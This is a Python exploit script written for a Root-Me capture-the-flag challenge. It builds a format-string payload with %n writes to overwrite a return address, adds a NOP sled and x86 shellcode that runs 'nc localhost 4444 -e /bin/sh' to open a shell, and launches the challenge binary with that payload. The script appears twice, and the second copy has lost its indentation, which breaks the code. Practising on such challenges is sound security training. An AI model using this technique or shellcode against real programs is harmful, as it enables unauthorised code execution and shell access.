thehackerish/e.py

## e.py
import socket, struct, pipes, subprocess
from time import sleep
import sys, os

HOST, PORT = ('challenge03.root-me.org', 2223)

RET = 0x08049754
BUFFER_ADDR = 0x8049880
FMT_OFFSET = 145
SHELLCODE = '\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x6e\x63\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68'

def little_endian(addr):
	result = struct.pack('<L', addr)
	return result

def big_endian(addr):
	result = struct.pack('>L', addr)
	return result

def get_positive(number1, number2):
	number = number1 - number2
	if number <= 0:
		number = (number1 + 16**2) - number2
	#print "%s = %s - %s" % (number, hex(number1), hex(number2))
	return number

def get_bytes_number(addr):
	bytes = little_endian(addr)
	result = [0,0,0,0]
	result[0] = get_positive(ord(bytes[0]), 16)
	for i in range(1,4):
		result[i] = get_positive(ord(bytes[i]), ord(bytes[i-1]))
	return result

def recvall(sock):
    result = ''
    while True:
        buff  = s.recv(1024)
        if not buff: break
        result += buff
    return result

def hexify(chaine):
	return ''.join(hex(ord(i)) for i in chaine)

shellcode_addr = BUFFER_ADDR + 10
offsets = get_bytes_number(shellcode_addr)
offsets_payload = ''.join('%'+str(offsets[i])+'x'+'%'+str((FMT_OFFSET+i))+'$n' for i in range(4))
ret_payload = ''.join(little_endian(RET + i) for i in range(4))
payload = 'A' + ret_payload + offsets_payload + '\x90'*20 + SHELLCODE
print payload
#subprocess.call("gdb --args /challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)
subprocess.call("/challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)
	import socket, struct, pipes, subprocess
	from time import sleep
	import sys, os

	HOST, PORT = ('challenge03.root-me.org', 2223)

	RET = 0x08049754
	BUFFER_ADDR = 0x8049880
	FMT_OFFSET = 145
	SHELLCODE = '\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x6e\x63\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68'

	def little_endian(addr):
	result = struct.pack('<L', addr)
	return result

	def big_endian(addr):
	result = struct.pack('>L', addr)
	return result

	def get_positive(number1, number2):
	number = number1 - number2
	if number <= 0:
	number = (number1 + 16**2) - number2
	#print "%s = %s - %s" % (number, hex(number1), hex(number2))
	return number

	def get_bytes_number(addr):
	bytes = little_endian(addr)
	result = [0,0,0,0]
	result[0] = get_positive(ord(bytes[0]), 16)
	for i in range(1,4):
	result[i] = get_positive(ord(bytes[i]), ord(bytes[i-1]))
	return result

	def recvall(sock):
	result = ''
	while True:
	buff = s.recv(1024)
	if not buff: break
	result += buff
	return result

	def hexify(chaine):
	return ''.join(hex(ord(i)) for i in chaine)

	shellcode_addr = BUFFER_ADDR + 10
	offsets = get_bytes_number(shellcode_addr)
	offsets_payload = ''.join('%'+str(offsets[i])+'x'+'%'+str((FMT_OFFSET+i))+'$n' for i in range(4))
	ret_payload = ''.join(little_endian(RET + i) for i in range(4))
	payload = 'A' + ret_payload + offsets_payload + '\x90'*20 + SHELLCODE
	print payload
	#subprocess.call("gdb --args /challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)
	subprocess.call("/challenge/app-systeme/ch23/ch23 %s" % pipes.quote(payload), shell=True)